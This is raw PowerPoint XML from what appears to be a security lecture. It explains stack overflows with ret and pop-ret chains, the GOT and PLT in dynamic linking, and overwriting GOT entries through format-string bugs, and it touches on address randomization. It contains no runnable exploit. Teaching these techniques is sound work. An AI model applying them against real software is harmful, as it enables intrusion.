                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>       to point the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>      It depends on your strategy.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="79042" y="4845796"/>
            <a:ext cx="2613865" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-150" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AAAA………………...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" spc="-150" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1638262" y="3459531"/>
            <a:ext cx="608808" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1283120" y="2872085"/>
            <a:ext cx="1396763" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>pop - ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1589414" y="1693374"/>
            <a:ext cx="725454" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" tIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1813538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FFB03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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1529319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990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Other Non-randomized Sections</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dynamically linked libraries are loaded at runtime. This is called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>lazy binding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Two important data structures </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Global Offset Table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Procedure Linkage Table</a:t>
            </a:r>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t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="3524072"/>
            <a:ext cx="3035356" cy="1200328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>commonly positioned</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>statically at </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>compile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>-time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Brace 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="3657600"/>
            <a:ext cx="228600" cy="990600"/>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74935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Dynamic Linking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(“hello ”);</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dynamic_linker_addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="87589" y="2111771"/>
            <a:ext cx="2822124" cy="364981"/>
            <a:chOff x="87589" y="2111771"/>
            <a:chExt cx="2822124" cy="364981"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="2111771"/>
              <a:ext cx="2452513"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p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="87589" y="2123416"/>
              <a:ext cx="291966" cy="30658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875897" y="2145318"/>
            <a:ext cx="3051043" cy="2426682"/>
            <a:chOff x="875897" y="2145318"/>
            <a:chExt cx="3051043" cy="2426682"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Right Arrow 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="21349956">
              <a:off x="3065642" y="2145318"/>
              <a:ext cx="861298" cy="132167"/>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875897" y="3527621"/>
              <a:ext cx="2749131" cy="1044379"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 79183"/>
                <a:gd name="adj2" fmla="val -170700"/>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Transfer control to PLT entry of </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
                <a:t>printf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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LIBC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5883108" y="2223454"/>
            <a:ext cx="3011146" cy="3572452"/>
            <a:chOff x="5883108" y="2223454"/>
            <a:chExt cx="3011146" cy="3572452"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Hexagon 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5883108" y="4394377"/>
              <a:ext cx="2029161" cy="1401529"/>
            </a:xfrm>
            <a:prstGeom prst="hexagon">
              <a:avLst>
                <a:gd name="adj" fmla="val 14584"/>
                <a:gd name="vf" fmla="val 11547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Linker</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Curved Left Arrow 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="533263">
              <a:off x="8210021" y="2223454"/>
              <a:ext cx="684233" cy="3084516"/>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rot="5400000">
            <a:off x="6682638" y="4009597"/>
            <a:ext cx="363138" cy="169151"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="558ED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747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12940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3" presetClass="exit" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="blinds(horizontal)">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Dynamic Linking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(“hello ”);</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dynamic_printf_addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="87589" y="2111771"/>
            <a:ext cx="2822124" cy="364981"/>
            <a:chOff x="87589" y="2111771"/>
            <a:chExt cx="2822124" cy="364981"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="2111771"/>
              <a:ext cx="2452513"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p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="87589" y="2123416"/>
              <a:ext cx="291966" cy="30658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457200" y="3758777"/>
            <a:ext cx="3897744" cy="1113726"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 90692"/>
              <a:gd name="adj2" fmla="val -46840"/>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Linker fills in the actual addresses of library functions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="844662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Dynamic Linking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(“hello ”);</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dynamic_printf_addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="87589" y="2622736"/>
            <a:ext cx="2974389" cy="364981"/>
            <a:chOff x="87589" y="2111771"/>
            <a:chExt cx="2974389" cy="364981"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="2111771"/>
              <a:ext cx="2604778"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p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="87589" y="2123416"/>
              <a:ext cx="291966" cy="30658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Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21349956">
            <a:off x="3065642" y="2145318"/>
            <a:ext cx="861298" cy="132167"/>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04373" y="3670146"/>
            <a:ext cx="3537439" cy="107461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Subsequent calls to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>do not require the linker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Right Arrow 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="7495899" flipV="1">
            <a:off x="2843853" y="3848872"/>
            <a:ext cx="3856408" cy="187335"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">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747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41823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90000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploiting the linking process</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GOT entries are really function pointers positioned at known addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Idea:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> use other vulnerabilities to take control (e.g., format string)</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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2769411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2676525" y="1012825"/>
            <a:ext cx="500063" cy="3886200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 499932"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 3885381"/>
              <a:gd name="connsiteX1" fmla="*/ 498970 w 499932"/>
              <a:gd name="connsiteY1" fmla="*/ 2101432 h 3885381"/>
              <a:gd name="connsiteX2" fmla="*/ 136082 w 499932"/>
              <a:gd name="connsiteY2" fmla="*/ 3885381 h 3885381"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="499932" h="3885381">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="238145" y="726934"/>
                  <a:pt x="476290" y="1453869"/>
                  <a:pt x="498970" y="2101432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="521650" y="2748995"/>
                  <a:pt x="136082" y="3885381"/>
                  <a:pt x="136082" y="3885381"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="8E2800"/>
            </a:solidFill>
            <a:prstDash val="lg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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2933700" y="608013"/>
            <a:ext cx="6191538" cy="5934075"/>
            <a:chOff x="2933337" y="608732"/>
            <a:chExt cx="6192670" cy="5933431"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="16400" name="Group 8"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2933337" y="2529295"/>
              <a:ext cx="3501078" cy="2368397"/>
              <a:chOff x="2933337" y="2529295"/>
              <a:chExt cx="3501078" cy="2368397"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="16411" name="Group 4"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3625404" y="2529295"/>
                <a:ext cx="2114493" cy="2314135"/>
                <a:chOff x="4029229" y="2533274"/>
                <a:chExt cx="2114493" cy="2314135"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="16413" name="Picture 1744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9229" y="2533274"/>
                  <a:ext cx="2114493" cy="21144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414" name="TextBox 70"/>
                <p:cNvSpPr txBox="1">
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm rot="766275">
                  <a:off x="4189287" y="4447342"/>
                  <a:ext cx="1435910" cy="400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solidFill>
                        <a:srgbClr val="990000"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri"/>
                    </a:rPr>
                    <a:t>Randomize</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="1800" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="990000"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri"/>
                    </a:rPr>
                    <a:t>!</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Right Arrow 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2933337" y="2675433"/>
                <a:ext cx="3501078" cy="2222259"/>
              </a:xfrm>
              <a:prstGeom prst="rightArrow">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 50000"/>
                  <a:gd name="adj2" fmla="val 35712"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="B64926">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6401" name="Group 9"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="6434415" y="608732"/>
              <a:ext cx="2691592" cy="5933431"/>
              <a:chOff x="6434415" y="608732"/>
              <a:chExt cx="2691592" cy="5933431"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="43" name="TextBox 42"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6434415" y="608732"/>
                <a:ext cx="1600493" cy="792076"/>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addr</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" dirty="0"/>
                  <a:t> of </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
                  <a:t>buf</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
              </a:p>
              <a:p>
                <a:pPr algn="ctr">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" dirty="0"/>
                  <a:t>(0xffffd5d8)</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="44" name="Rectangle 43"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6434415" y="608732"/>
                <a:ext cx="1600493" cy="532072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 name="TextBox 44"/>
